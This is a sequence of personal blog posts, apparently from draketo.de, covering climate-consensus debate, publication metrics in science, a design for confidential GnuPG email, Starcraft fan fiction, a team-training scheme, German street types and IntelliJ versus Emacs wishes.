An explanation how humans increase the CO₂-concentration of the atmosphere is available in my presentation The carbon cycle: https://www.draketo.de/licht/physik/kohlenstoffkreislauf-carbon-cycle

And if you want my best estimate of our current situation, have a look at the article Two visions of our future: https://www.draketo.de/english/politics/roll-a-die

Fußnoten:

1

You can check the albedo for several different spectral regions at http://www.globalbedo.org/

3

We’re only going to 1950 and not back to 1850, because the temperature data at 1850 would mix in the effect of the declining little ice age.

4

Berkeley Earth provides a reevaluation of all the surface measurements without complex models.

5

HadCRUT4 combines sea surface temperature data from the Hadley Centre of the UK Met Office and the land surface air temperature records compiled by the Climatic Research Unit (CRU) of the University of East Anglia.

Autor: Arne Babenhauserheide

AnhangGröße
greenhouse-effect.org20.95 KB
greenhouse-effect-solar-radiation-earth-radiation.svg14.6 KB
greenhouse-effect-solar-radiation-earth-radiation.png62.39 KB
greenhouse-effect-thumbnail.png12.76 KB
greenhouse-effect.pdf349.56 KB

comment on scientific consensus: distorting a debate to hide the majority view

I just discussed with “sceptics” on twitter about climate change. There Ronan Connolly ‏(@RonanConnolly) showed me his article which tries to give the impression that there is no scientific consensus about climate change being man-made. I spent some time answering that, and I want to share those answers here so they do not get lost in twittering.

This is how that started:

Ronan Connolly: @ArneBab @dhb7 @randal_olson Arne, have you read my "Is there a scientific consensus on global warming?" essay? — 8:14 PM - 27 Jun 2014

These are my answers, in the short format I used on twitter, just with the recipients taken out (because those are highly repetitive):

The structure and style of the article

your scale of 1 to 5 mixes up two completely separate issues: “Is it a crisis” and “is it man-made”

You later complain that people mix global warming and man-made, but that’s what you do in the article.

Your claim that modellers want to hide uncertainty is also wrong: They are up-front with uncertainties.

At this point I saw a reply from Ronan (I had missed about 5 others because I was busy actually reading the article and watching the videos linked in it):

Ronan Conolly: Did you read the Shackley et al., 1999 article I referenced as an example?

that article says that modellers don’t talk publicly about adjustments they themselves call fudge-factors which correct for stuff the models cannot represent correctly yet - and links to a 15 year old paper which scientists have since acted upon and replaced the adjustments by measures backed with solid theory. To give the article of Ronan credit: It does also link to chapter in the IPCC which states that those flux adjustments are no longer used.

If you wonder why some don’t talk openly, just read your own article. I already debunked lots of it. Will you include that?

Ronan Conolly: Which bits have you debunked?

The core of my criticism (1/2): you show man-made + crisis vs. natural + harmless — and then complain people mix that up.

core criticism (2/2): You show 5 equal positions, while even Singer says “most disagree with me” ⇒ Misrepresents statistics.

You show a linear range, but there is a distribution of scientific views - with the huge majority on the man-made side.

If you give as much space for a fringe position as for a majority position, you distort the actual distribution.

You list “examples”, but actually you picked a scale and then show 2-3 on each point on the scale. Try that with racism.

and the range you show isn’t actually one range, but two distributions. Man-made is almost a consensus. Catastrophic is not.

you complain about terminology (global warming vs. man-made g.w.) and then you use a scale which mixes both together.

The scientists arguing for natural causes

On Prof. John Christy: I saw some model-results this week. Models cannot yet predict regional changes.

(he claims that the regional distribution of temperature change disagrees with models, and uses that to argument that there is no global warming)

On Prof. Christy: Greenpeace showed, when cutting all subsidies wind is already cheaper than nuclear.

Ronan Connolly: 1) Can you give a reference? […]

Reference to greenpeace showing that wind and water are cheaper than coal and nuclear: greenpeace-energy.de/presse/artikel/article/wind-und-wasser-schon-heute-billiger-als-kohle-und-atom.html

Debunking Prof. Carter: “half the scientists think the warming natural” ← None from the ones I know personally.

Debunking Singer: The oceans in the last 15 years show the warming. Same for satellites: http://www.skepticalscience.com/satellite-measurements-warming-troposphere.htm …

But to give Singer credit: He correctly assessed that most climate scientists disagree with him.

Also you cite Prof. Svensmark and then say the equivalent of “the base of their theory has been disproven”.

Ronan Connolly: 1) I said Svensmarck's work is hotly debated, not "disproven". 2) Do you agree that there's wide range of views on global warming?

On Svensmark: I said “it’s the equivalent of disproven”, because including new data destroys the correlation it’s based on.

(the second part was already disproven earlier in this article: Not one range, two distributions with a very clear consensus-peak at man-made)

Doing it right

To make the article halfways accurate in reflecting the scientific view, there are two most important points to change:

Done right (1/2): 2 scales: man-made vs. natural and crisis vs. harmless. ⇒ consistent with complaint that people mix these.

Done right (2/2): Ask scientists instead of using media interviews (distorted due to the fair-and-balanced doctrine).

(note that the fair-and-balanced doctrine is special to climate science: On Russia they never require fair-and-balanced)

(naturally the scientists have to be picked at random, so the distribution of views is sampled correctly).

counting scientific publications as metric for scientific quality is dumb

Scientific institutions1 currently base a large part of their internal evaluation, their comparison to others, and their hiring decisions on counting publication (with a number of different scorings).

And this is dumb.

On the surface this causes pressure to publish as many papers as possible2 which drives down quality of publications to the lowest standard reviewers accept.3 And it strengthens a hierarchy of publishers, where some publications are worth more than others based on the name of the journal. That simplifies funding decisions. But makes them worse. And it creates an incentive to get a maximum of prestige with a minimum of substance.4

But publications are how scientists communicate. Adding another purpose to them reduces their value for communication — and as such harms the scientific process. Add to this that the number of scientists is rising and that scientific communication is already facing a scalability crisis, and it’s clear that counting publications as a metric of value is dumb. That’s clear to every scientist I ever talked to in person (there are people in online-discussions who disagree).

That it is still done shows that this pressure to publish is a symptom of an underlying problem.

This deeper problem is that there is no possible way to judge scientific quality independently. But universities and funders want competition (by ideology). Therefore they crave metrics. But »When a measure becomes a target, it ceases to be a good measure.«

Science is a field where typically only up to 100 people can judge the actual quality of your work, and most of these 100 people know each other. Competition does not work as quality control in such a setting; instead, competition creates incentives for corruption and group-thinking. Therefore the only real defense against corruption are the idealism of scientific integrity (“we’re furthering human knowledge”) and harsh penalties when you get caught (you can never work as scientist again).

But if you have to corrupt your communication to be able to work in the first place, this creates perverse incentives to scientists5 and might on the long run destroy the reliability of science.

Therefore counting publications has to stop.

Science is a field where constant competition undermines the core features society requires to derive value from it. Post-doc scientists proved over more than a decade that they want to do good work. Their personal integrity is what keeps science honest. Scientific integrity is still prevailing in most fields against the corrupting incentives from constant forced competition, but it won’t last forever.

If we as society want scientists we can trust, if we want scientific integrity, we have to move away from competition and towards giving more people permanent positions in public institutions; especially for science staff, the people who do the concrete work; the people who conduct experiments, search for mathematical proofs, and model theories.

Scientific integrity, personal motivation to do good work for the scientific sub-community (of around 100 people), and idealism (which can mean to contradict the community), along with the threat of being permanently expelled for fraud, are the drivers which produce good, reliable scientific results.

To get good, reliable results in science, the most important task is therefore to ensure that scientists do not have to worry too much about other things than their scientific integrity, their scientific community, and their idealism. Because it is only the intrinsic motivation of scientists which can ensure the quality of their work.


  1. For this article scientific institutions mainly means those state-actors who finance scientists and those private actors who employ scientists and compete for state funding. 

  2. The problem here is pressure to inflate the impact metrics of publications. Publishing should be about communicating research, not about boosting ones job opportunities. 

  3. This argument is based on discussions I had with many other scientists over the years, along with experiences like seeing that people split publications into several papers to increase the publication count, even though that does not improve the publication itself. It is also based on the realization that few scientists I met were still following all publications in their sub-field. For a longer reasoning see information challenges in scientific communication

  4. That said: While I did my PhD and postdoc in atmospheric physics (up until 2017), I worked with many scientists from several different countries, and every single one of them lived the idealism of scientific integrity and put it before the harmful incentives. So while some of the incentives over the past decades are a problem, they do not at present destroy the reliability of science in general. 

  5. The effect of these perverse incentives get even worse, by the divide (keyword: dual labor market) between those in secure positions and young scientists which forces almost everyone to survive the stage with perverse incentives before securing a stable position. This is so striking that from the outside it must look as if the current employment structure had been designed with the explicit intent to disrupt scientific integrity, though “grasping for straws when trying to do the impossible” (quantifying scientific quality) is likely a better explanation — which does not shed a good light on science administration and policy makers. 

Secure communication with GnuPG and E-Mail

How E-Mail with GnuPG could hide when you talk, where you talk from and what you talk about.

or in technical terms:

E-Mail with perfect forward security, hidden subject and masked date using GnuPG and better frontends.

Update 2018: Some of these ideas are becoming real and widespread now with pΞp (pretty-easy-privacy) and the autocrypt-standard.

If you regularly read my articles, you’ll know that I’m a proponent of connecting over Freenet to regain confidential and pseudonymous communication.

Here I want to show how it would be possible to use E-Mail with GnuPG to get close to the confidentiality of Freenet friend-to-friend communication, because we have the tech (among the most heavily scrutinized and well-tested technology we use today) and we have the infrastructure. All it requires are more intelligent E-Mail clients. Better UI which makes the right thing easy.

Why isn’t encrypted E-Mail confidential?

What is that wretched metadata?

Sending an encrypted E-Mail currently levaes all kinds os non-encrypted public traces, while it travels over the servers:

  • When you wrote (date)
  • What you wrote about (subject)
  • Who you wrote to (sender + receiver)
  • Where you wrote from (via your IP)

Also there is no perfect forward security (PFS), so all your past E-Mail can be decrypted when someone one day manages to crack your key or the key of the person you talk to.

It might take a few weeks or months, but if at one point you become important, people in power will crack your key – maybe by simply hacking (or confiscating) your laptop.

And then they can read all E-Mails you received with it. Even if you deleted them, because they likely still have a copy.

Crack once, read everything

And finally, almost no one uses GnuPG, because (for one thing) key verification is cumbersome and E-Mail clients make it hard to use. But on the upside, all these issues can be solved without touching a line of GnuPG code. All you need to fix are the clients.

Regaining confidential communication with E-Mail

To make E-Mail confidential with GnuPG, there are 5 challenges to overcome:

  • Make GnuPG effortless to use (no setup for the user!)
  • Ensure that most encrypted content stays encrypted after security breaches
  • Protect the subject line
  • Mask the date and time of communication
  • Mask the physical location

I’ll go through them all with short notes how they can be realized. None of these requires experimental concepts, since most of the ideas have been known for years. They just weren’t collected and implemented.

Effortless GnuPG

The first issue which hinders users from encrypting is that they need to exchange and verify keys before they can use GnuPG. The second issue is incompatibility between free E-Mail clients.

Eradicating the requirement to verify all keys

This is a major hassle, and it is required if we want to be safe against man-in-the-middle attacks (MitM). This is not required, though: If we want to secure E-Mail for most users, we only need to ensure that a MitM is detected either when it starts or when it ends. That makes it arbitrarily expensive to realize mass surveillance, because it means that every MitM attack has to be preserved indefinitely: If it stops, the surveillance target will become suspicious and invest the effort to do a real key verification.

Detect start and end of MitM

This is no new idea: All this was already described in the GnuPG subproject STEED (whitepaper as PDF).

The most important part is to follow SSL/TLS and SSH by realizing TOFU for E-Mail: Trust on first use.

Usable key verification

Resilient interaction between different free clients

E-Mail clients frequently fail to verify E-Mails from other clients. We cannot fix unfree clients like Outlook, but the free ones can be changed to try again if a given method fails: Do everything possible to try to get the message to decrypted and the signature verified, even if that requires being more relaxed than specified by an RFC. Other programs won’t get fixed just because your program shows that they do it wrong. People will just stop using GnuPG.

A recent example of this problem (which bit me personally) is that Thunderbird with Enigmail 1.7.0 and 1.7.2 failed to verify mails from KMail, but it’s not the first time that there are problems between those two. Another is that Enigmail fails to verify a Mail from Horde with a user signature, because a space in the signature isn’t encoded correctly. It’s all and nice that this is wrong by Horde, but failing the verification without sensible error (which tells the user how to fix the issue) is the worst possible reaction. That’s as if a web browser would fail out whenever there’s a problem on a website: Users would just stop using that browser. For some reason developers think that not decrypting a GnuPG message even though there’s no security problem is somehow OK.

Making interaction between E-Mail clients resilient requires a shift in mentality: That it is the responsibility of every client author to not just send correct E-Mails but also to treat decoding received E-Mails from all existing (free) clients as crucial to their task: If this fails, then the program is broken (within reasonable limits: correctly receiving E-Mails must not become so hard that no one implements it).

Usable encrypted E-Mail

Ensure that most encrypted content stays encrypted after security breaches

To protect the content of mails against breaking the main GnuPG keys we can realize Perfect Forward security for E-Mail by attaching a session key (the public key of a new keypair, signed by the main key of the sender) when sending an E-Mail to a given E-Mail address for the first time. When an E-Mail client receives such a session key and the signature is valid and from the sender, it should use that key as encryption key in subsequent answers - and attach its own session key.

Once the original sender switched to the session key of the original receiver, the communication can no longer be decrypted using only the main key of sender or receiver. Sender and receiver can save stored mail in re-encrypted form (with their main key) and refresh the session keys after a given number of mails were exchanged or after a given time (i.e. 100 mails or a month, what’s longer - always keep usability in mind!).

This means that mail which sender and receiver did not store will be safe from decryption even if the main key of sender or receiver is cracked at some point. Protecting E-Mails on the disks of the communication partners is outside the threat model here: If the E-Mail is sensitive, the communicatin partners can simply delete it to ensure that it is really gone once they delete the session keys.

Resilient Encryption: Perfect Forward Security

Protect the subject line

The most sensitive information which encrypted E-Mail still spills is the subject line. It provides the topic of the E-Mail and is sadly needed nowadays to protect against Spammers without trusting centralized services which cannot work for encrypted E-Mail.

To protect the subject line, we can follow the old Cypherpunk remailer protocol (example): Have an empty subject line, but start the encrypted content of the E-Mail with a new header field:

##
Subject: THE REAL SUBJECT

content to show the user follows here

(the cypherpunk protocol uses :: and ## as identifiers, and don’t know the exact semantic defference, so you might find that using :: to start the replacement headers might be more appropriate.)

Using an empty subject is already a widespread (bad-) practice, so it should not make the encrypted messages more tracable than before.

If users use no subject, the E-Mail clients should display the first 80 characters of the decrypted message in place of a subject. Yes, this only shows subjects after decrypting – which is how it should be.

Use an empty subject and redefine it in the encrypted part

Mask the date and time of communication

To hide when a message is written, we can mask it under other traffic: using encrypted E-Mail for automated coordination of programs. We already send encrypted, signed E-Mails, and for each E-Mail address there is an accepted key. So we can now select trusted contacts whose messages our E-Mail program can interpret automatically, for example to set calendar entries or update the address book. We can implement social features subscribing to status updates (like twitter) or re-sharing articles over E-Mail, because signed and encrypted E-Mail provides a trusted channel without creating an opening for spammers and scammers: If there is one piece of software which has been battle tested by all kinds of malicious people then it’s GnuPG. Using E-Mail to convey information to be interpreted automatically is for example what Infocalypse uses to implement pull-requests over Freenet (E-Mail over Freenet provides additional protections compared to plain E-Mail – it hides metadata and content thanks to using Freenet as anonymous decentralized data storage and avoids spam via propagating trust and spam marking – so it can already implement this automated information channel without exposing its users to large scale exploits).

But while it would be wonderful to have fully automated social features over E-Mail, this is just a side product: The really important effect would be that there would be a constant flow of cover traffic which hides actual communication.

Mask “When”: Social features as cover traffic to mask date and time of real messages

Mask the physical location

The final piece to the metadata puzzle is the physical location from which we communicated. If people can see where we wrote from, we can never write from a smartphone without exposing more metadata than I dare to think about.

To hide our location, we need an anonymizing channel like hidden services on tor or i2p.

Mask “Where”: Connect to your E-Mail provider over hidden services

If you can get your friends to join, too, then E-Mail over Freenet would already provide this without making your E-Mail provider a target for anonymous cracking attacks.

Conclusion

We already have the basic technology for making E-Mail between trusted friends truly confidential again. We can hide

  • The content of the mail,
  • The topic by faking the subject,
  • The time when we talked by creating cover traffic and
  • Our physical location where we wrote from.

People can still find out who knows whom, but can no longer see when they talk, where they talk from or what they talk about.

„Seit ich meine E-Mails mit GnuPG verschlüssele, habe ich keine Ausschreibung mehr an eine US-Firma verloren.“ – Paul Sibel to Anna Gram from his towel on 2015-05-25. (english version from Google translate, slightly wrong but fun: "Ever since I encrypt my emails with GnuPG, I lost no invitation to a US company.")

So I call upon all E-Mail client developers: Please implement these measures to allow users to talk confidentially again. You do not need additional support from GnuPG for that. It can all be done in the code you know best.

We cannot make E-Mail pseudonymous, but at least we can make it confidential.

PS: The technology for this is not in E-Mail clients yet, so if you want confidential communication now, your best bet is to connect over Freenet – which additionally gives you pseudonymous communication. Using Freenet you regain the full set of communication options you have in the physical world:

  • confidential discussion in private,
  • self-censored public speech and
  • free pseudonymous publishing.

Strong Kerrigan

New Link: draketo.de/kreatives/strong-kerrigan

When you win Starcraft 2 Heart of the Swarm in brutal difficulty without losing Kerrigan even once, you get an ending with a truly strong Kerrigan.234

Clearly you are my greatest failure. Now at long last, you will die.

Again Mengsk activates the Xel'Naga artifact. As the lightning from the artifact tears at her flesh and cracks every part of her body, Kerrigan rasps an answer:

You forged me, but I chose my own path.

Emperor Mengsk takes a gun while Kerrigans bone-wings flail through empty air. She whispers:

There’s something you don’t know.

Her talons touch the base of the Xel'Naga artifact. Crushed by limbs which tear through the armor of siege tanks, the base cracks, breaks through the ground and disappears, taking the artifact with it.

Instantly Mengsk fires his gun. The shot hits Kerrigans head and throws her backwards to the ground.

It was nice, Kerrigan. Every dominion needs an enemy. You helped me stabilize my rule. But I could not give you the time to recover.

Kerrigans limbs shiver, her mouth forms silent words:

I am the swarm.

Mengsk fires again and Kerrigans body goes limp. Then Mengsk takes a rug to clean his gun. As he puts it away, a scream from one of his surviving guards echoes through the cracked door to his room. Moments later two Zerglings throw themselves through the opening and at Mengsk. Two sure shots take them out.

Then a faint voice echoes in Mengsks mind:

As long as…

A Hydralisk appears in the door, its fangs wide open, a spine readying deep in its throat. Mengsk fires and his shots crush bones, but the spine stays poised. Alien eyes focus on Mengsk, and the voice in his thoughts is no longer quiet. It booms in his mind and in all those around him:

…the swarm lives,…

The voice cuts through the mind of every being on the planet. Children cry, old men stumble and even the strongest are shaken to their very bones, as they see the image of Mengsk through the eyes of the Hydralisk. A distorted image of their Emperor, shimmering in the throb of blood within his veins. They feel the sudden release of the tension in the sinews of the Hydralisk as it catapults the spine towards Mengsk. And a voice pierces their minds which they will never forget in their lifetime:

…so do I.

The spine cuts through Mengsks armor and crushes his chest. Bone fragments fly from the wall behind him and blood spills over his Uniform. As the Emperor slumps down and more Zerglings fill the room to tear him apart, the voice continues:

I am the swarm.

Billions of terrans stand witness as Kerrigan breaks free from a Zerg egg. Watched by a thousand Zerg, her bone wings extend into every corner of the living chamber that gave birth to her new body and caress the walls which pulsate with the rhythm of an alien heart. Her voice imprints her words into the memory of every terran on Korhal:

I now see my true enemy. He awaits for me in the void. Wielding powers I cannot imagine. I go to face him, having renounced everything. My humanity. My identity. The man I love. But I will not face this enemy alone.

The presence weakens. Then a vast darkness fills the minds of all terrans on the planet, while they realize that now, they are alone. Alone with memories they can never forget.

I am the swarm.


  1. The epub icon was created by the Oxygen Team (kde.org) and is licensed under the GNU LGPL

  2. This is what I’d have wished to see. But it is just a fantasy, not the actual ending. 

  3. All characters in this story belong to Blizzard. I also published this story in the Starcraft forums

  4. The one thing I resent about Kerrigan in Starcraft 2 is that they made her weak.

    In SC1 Kerrigan embraced and ruled the swarm. She started as strong terran, never to let anyone talk down to her, never afraid to say what she wanted. Then she got infested, and she prevailed over the infestation, becoming the queen of blades, ruling the Zerg instead of being ruled by the Overmind.

    In the cutscenes of SC2 she’s a helpless wreck, ever reliant upon the help of others and exposed as a tool of the overmind to free the swarm from Amon.

    It feels as if someone wrote the story to deconstruct the legend of the queen of blades. The in-game story seems much better, though: it’s mainly the cinematic cutscenes that make her weak. Including the last one — and that last one is what I set out to fix in this text. 

AnhangGröße
strong-kerrigan.epub6.76 KB
application-epub-zip-128x128-lgpl-by-the-oxygen-team.png17.75 KB
2015-05-01-Fr-starcraft-2-alternative-ending-strong-kerrigan.org4.52 KB

Style over Substance

Stories of Weaklings, who win every fight
against bigger foes with their voices might,

Stories of Anarchists, who do nothing more,
than talk and talk, and still win the war.

Stories of Mages, who mumble and roar,
for a fizzling spell, which still makes them sore.

Stories of Dreamers, who sing in the night,
and weave our future, shining so bright.

All this you can find here, come out of the dark,
set Style over Substance, for that is our mark.

(I actually usually do the opposite, but there is
something to stories of those who live on style)

Team Starter

Get a team of 8-12 people connected and up to speed in a week, 24 in two weeks, 30 in three weeks — while never having more than 7 people in any group. Build a healthy team of 100 people with just one hierarchy level within 6 weeks.

Note that only the 8-12 structure is built on experiments. The others are theoretical considerations which will need to be adapted to the challenges of large operations.

(1) Principles for healthy teams

  • Groups of more than 7 people are not efficient at structured communication, so individual groups should have at most 7 people.1
  • Every team member should have worked with every other person at least once.
  • Stable subgroups have a mentor-trainee structure: One more experienced person with up to two beginners.
  • For large teams: Start with a group of people who become mentors and trainers for the others.

(2) Up to 7 people (one session)

Small teams up to 7 people simply train together. They all know each other.

(3) 8-12 people (4 sessions)

In larger teams the communication overhead would grow too large when all members are working in one group. With 8-12 people the training is done in two steps. In the first step, 6 volunteers do one session together. These volunteers become mentors for the others. In the second step, the team is split into 4 subgroups with 2 to 3 people, each with at least one of the volunteers from the first step (in addition to 1-2 beginners).2

(3.1) First step: 6 volunteers (1 session)

As first step, call for 6 volunteers. They do one session together where they learn the basics of the task for which you are building the team, as well as how to do the training.

At least four of the six volunteers will become mentors in the next step.

If you have 10 or more people to train (including the volunteers), up to two people can decide to get working instantly instead of taking part in further training. For example they can prepare the infrastructure for the others.

(3.2) Second step: 4 subgroups (3 sessions)

In the second step, the team is split in four subgroups. In each of the next 3 sessions, the four groups are joined in different ways into two larger groups, ensuring that each group worked with each other group after 3 sessions.

Let’s call the groups A, B, C and D.

Now three sessions with separate subtopics are done by two groups, each formed from two subgroups:

  1. AB and CD
  2. AC and BD
  3. AD and BC

Each of the sessions for each group is organized by one of the mentors, with the overall trainer providing materials and support.

For example the two groups in session 1 could be organized by the mentor from subgroup A and by the mentor from subgroup C. For session 2 the mentor from A and the mentor from B could organize. And in session 3 organization could be done by the mentor from D and the mentor from C.

  1. A B and C D
  2. A C and B D
  3. A D and B C

After these three sessions, every person worked with every other person at least once, and each of the four subgroups stayed together during all of the second step. And within each subgroup, there’s a mentor-trainee structure, since one person in each subgroup already got the training in the first step. The mentors solidify their knowledge in the sessions they run by teaching part of what they learned before.

If during your training non-mentors want to switch subgroups, just add them to the other group. Only exchange in both directions if one of the subgroups would have only one person left.

Best avoid showing people their group. Instead always assign by name to avoid fostering competition during the training.

(4) 12 to 18 people (6 sessions)

As with 8-12 people the training is run in two steps. In the first step, 7 volunteers do one session together. These volunteers become mentors for the others. In the second step, the team is split into 6 subgroups with 2 to 3 people, each with at least one of the volunteers from the first step (in addition to 1-2 beginners). One of the groups can work without mentor, because the groups will be combined.

(4.1) First step: 6 volunteers (1 session)

As first step, call for 7 volunteers. They do one session together where they learn the basics of the task for which you are building the team, as well as how to do the training.

At least 3 of the 7 volunteers must become mentors in the next step, ideally 6 should become trainers.

If you have 14 or more people to train (including the volunteers), up to two people can decide to get working instantly instead of taking part in further training. For example they can prepare the infrastructure for the others.

(4.2) Second step: 6 subgroups (5 sessions)

In the second step, the team is split in 6 subgroups. In each of the next 5 sessions, the 6 groups are joined in different ways into 3 larger groups, ensuring that each group worked with each other group after 5 sessions.

This step requires at least 3 mentors from the first step. It should have 6 mentors.

Let’s call them A, B, C, D, E and F. The mentors are assigned to the groups in the order A,C,E,B,D,F. If there are 4 or less mentors, one group in step 2 will be run by the trainer. If there are only 3 mentors, step 3 and 4 will both also have one group run by the trainer (marked highlighted).

This works just like the training for 8-12 people, but with the grouping shown below.

  1. AB, CD, EF
  2. AC, BE, DF (needs trainer with 4 mentors)
  3. AD, BF, CE (needs trainer with 3 mentors)
  4. AE, BD, CF (needs trainer with 3 mentors)
  5. AF, BC, DE

(5) 16 to 24 people (8 sessions)

This training works like the 12 to 18 people step, but if there are 6 or less mentors, some steps will need the trainer to run one of the groups.

  • Step 1 will be the same as for 12 to 18 people, but with 7 volunteers.
  • Step 2 must get at least 4 mentors, it should get 7.

Assign the mentors in order A,C,E,G,B,D,F,H.

  1. AB, CD, EF, GH
  2. AC, BE, DG, FH (needs trainer with 6 mentors)
  3. AD, BF, CG, EH (needs trainer with 4 mentors)
  4. AE, BC, DH, FG (needs trainer with 5 mentors)
  5. AF, BD, CH, EG (needs trainer with 4 mentors)
  6. AG, BH, CF, DE (needs trainer with 4 mentors)
  7. AH, BG, CE, DF (needs trainer with 5 mentors)

(6) 20 to 30 people (15 sessions = 3 weeks)

Training up to 30 people so everyone worked with everyone else in the group takes three steps.

(6.1) Step 1: train 4 to to 7 people (1 session)

See 2. At least 3 of these must become mentors for the next step. To avoid requiring trainer-run sessions, at least 5 of these should become mentors (up to 6).

(6.2) Step 2: train at least 12 people (5 sessions)

See 4. At least 8 of these must become mentors for the next step. To avoid requiring trainer-run sessions, at least 9 should become mentors (up to 10).

This step can be done with 8 to 12 people and only 3 sessions instead (see 3), but might then require making all participants mentors.

(6.3) Step 3: train 20 to 30 people (9 sessions)

This works like (5) but mentors are assigned to groups in the order A,C,E,G,I,B,D,F,H,J. It requires at least 7 mentors. The groupings are as follows:

  1. AB, CD, EF, GH, IJ
  2. AC, BE, DF, GI, HJ (needs trainer with 8 mentors)
  3. AD, BF, CD, GJ, HI
  4. AE, BG, CJ, DH, FI
  5. AF, BH, CI, DG, EJ
  6. AG, BI, CH, DE, FJ (needs trainer with 7 mentors)
  7. AH, BJ, CF, DI, EG
  8. AI, BC, DJ, EH, FG
  9. AJ, BD, CG, EI, FH (needs trainer with 7 mentors)

(7) Start an organization of 77 to 135 people as connected group (23 sessions)

Putting all of these together, you can go one step further and start an organization which is as well-connected as possible with the least possible resources and time.

  1. Train 5 to 7 people. At least 4 of these become mentors for the next step. 1 to 3 people can start working right away and prepare the workplace for others. See 2 (1 session).
  2. Train 16 to 24 people. See 5. 15 of these will split in 3 sub-groups (5 people each)3 and act as mentors for the next step. These must be able to work without a trainer. 1 to 9 people can join the 1 to 3 from step 1 in preparing the workplace (7 sessions).
  3. Train 3 to 7 people (at least 1 person per sub-group) to be able to act as trainer (1 session).
  4. Train three sub-groups of 12 to 18 people each. See 4. From each group at least 7 mentors and one trainer will be needed for the next step. 5 to 11 people per sub-group can start preparing the sub-group workplace (5 sessions).
  5. Train three sub-groups of 20 to 30 people. See 6 (9 sessions).

At this point you have an organization of 77 to 135 people with an administration group whose members have all worked with at least one person from every group.

After step 2 there are 1 to 9 people who already work and who know all the mentors for the subgroups. If these take over organizatorial duties, every sub-group will have members who know the organizatorial group.

If you take one day per session, this training will take about 6 weeks.

If you split each of the sub-groups around 6 workgroups with 5 members each, so each group can work well and grow or shrink by 30% if needed, and split people who started the initial preparation into an administrative and an infrastructure group, you’ll have a structure which looks similar to Figure 1.

team-starter-structure.png

Figure 1: Organizational structure for 77 to 135 people with one hierarchy level.

(8) Start an organization of 250 people as connected group (37 sessions)

To scale this higher, you can continue after the last step of 7.

  1. 15 people in each of the three sub-groups split again into three sub-sub-groups each (5 people each) and act as mentors for the next step. These must be able to work without a trainer. 5 to 15 people can prepare a secondary administration tier.
  2. Train three times three sub-sub-groups of 12 to 18 people. See 4 (5 sessions).

Now there are 140 to 252 people in three levels.

You can still roughly double the size by having 5 to 11 people from each of the sub-sub groups train three times three sub-sub-groups of 20 to 30 people. See 6 (9 sessions).

(9) Conclusions

This article provides the tools to build strongly connected teams of up to 30 people — teams where everyone has worked with everyone else while group sizes never increased beyond seven.

In 7 and 8 the article provides additional tools to build larger groups by using organization groups (administration and infrastructure) as centralized connection between the subgroups.

Footnotes:

1

The number 7 stems from George A. Miller (1956), The Magical Number Seven, Plus or Minus Two: Some Limits on our Capacity for Processing Information, published in Psychological Review, 63, 81-97.

2

This structure was devised originally for scaling roleplaying weekends from 6 to 12 people while still ensuring that everyone played with everyone else at least once.

3

The groups need 5 mentors instead of the 3 from 4, because there will not be a trainer.

AnhangGröße
team-starter-structure.png15.93 KB
2016-01-25-Mo-team-starter.org12.97 KB
2016-01-25-Mo-team-starter.pdf243.25 KB

The exhaustive guide to German Streets

This is no absolute truth.

Name For pedestrians For Bikes For Cars Special english
Autobahn - - x No Speedlimit, unless specified Autobahn
Bundesstraße - if no fahrradweg x paid by federal government road
Landstraße - if no fahrradweg x paid by county, often narrower road
Straße if no fußweg if no fahrradweg x   road
Gasse x x x mostly narrow road
Weg if no fußweg if no fahrradweg x often not paved way
Fahrradweg - x - - bikepath
Fußweg x depends - bikes can be allowed by a sign ?
Feldweg x x x often just a mudpath path
Waldweg x if wider than 2m depends no one adheres to the 2m  
Pfad x x depends often of clay or gravel path
Trampelpfad x if wider than 2m - mud, no one adheres to the 2m path
Wildwechsel x - - maybe mud, used by daring cyclists path

If you spot any type of road I missed, please write to arne_bab@web.de with subject Straßenwissen.

Trajectories of Carbon from Tokyo

couldn’t resist this one ☺

I was only plotting trajectories of carbon dioxide from Tokyo, when this came up:

Trajectories of Carbon from Tokyo

How it began:

The deep ones!

Cthulhu fhtagn! ☺

(the line in gibberish1 says "In seinem Haus in R’lyeh wartet träumend der tote Cthulhu" — Ph'nglui mglw'nafh Thulhu R’lyeh wgah’nagl fhtagn).

Published here with permission from NOAA ARL, under the condition that I make it clear that they are not producing these images for me. Which I hereby do: To produce these images I used the great HYSPLIT from NOAA ARL, but the images were not created by someone for me.


  1. The gibberish is actually DEK shorthand: german stenography ☺ 

AnhangGröße
2017-06-30-fhtagn-steno-tokyo-rlyeh-cthulhu-fhtagn-trajectories-from-tokyo.jpg990.73 KB
2017-06-30-fhtagn-steno-tokyo-rlyeh-cthulhu-fhtagn-trajectories-from-tokyo-400x520.jpg99.69 KB
2017-06-30-fhtagn-steno-tokyo-rlyeh-cthulhu-fhtagn-trajectories-from-tokyo-only-bottom-big.jpg316.97 KB
2017-06-30-fhtagn-steno-tokyo-rlyeh-cthulhu-fhtagn-trajectories-from-tokyo-only-bottom.jpg20.56 KB

What I need from IntelliJ and what I deeply miss when I’m not using Emacs

Updates will be written on my new site: draketo.de/software/intellij-emacs

At work I’m using IntelliJ for Java development, but I’m not happy with the interface. It forces me out of my concentration and regularly breaks my flow by having stuff jump around and stealing focus.

But I cannot switch to something that works better for me, because there are features of IntelliJ that I require to work efficiently.

1 What I really need from IntelliJ

1.1 inspection

  • Where is this called? — all callers
  • Where is this implemented? Where is it declared? Or overridden?
  • Visual indicator whether a method is overridden or whether it overrides
  • Where is this defined (base method or concrete method)?

1.2 refactor

  • rename symbol,
  • change signature (with base method and overrides and callers),
  • extract method from selection,
  • extract variable / store selected expression in variable

1.3 run

  • Run tests in changed modules or in file
  • re-run test, restart current program
  • re-build incrementally
  • hot-swap without restart

1.4 debug

  • set breakpoint and see breakpoints, set conditional breakpoint
  • run project via eclipse run config main method (we replaced the eclipse stuff extracted with Eclipser by main methods)
  • inspect stack and state at break point
  • step over / in / out / continue

1.5 other

  • Jump to definition / caller (also with mouse CTRL-click), even for xml, so colleagues can do it when working at the same box
  • show all methods in file
  • VCS: ignore changes in some files
  • run Sonar Qube on changed files

2 What I deeply miss when not using Emacs

2.1 keyboard shortcuts

  • mnemnonic keybindings: When I type C-x r t, I thing x-rectacngle-text. That is why it works accross different keyboard layouts.
  • staying on the letter row

2.2 editing

  • killing to the end of the line with C-k (I actually added that to IntelliJ now)
  • cycling through the cut-paste list with M-y: Often I don’t need the last kill, but the one before. Yes, I can reach for the mouse and use klipper, but that slows me down and breaks my concentration. ——— C-S-v in IntelliJ uses paste from history
  • storing and retrieving multiple values with registers.
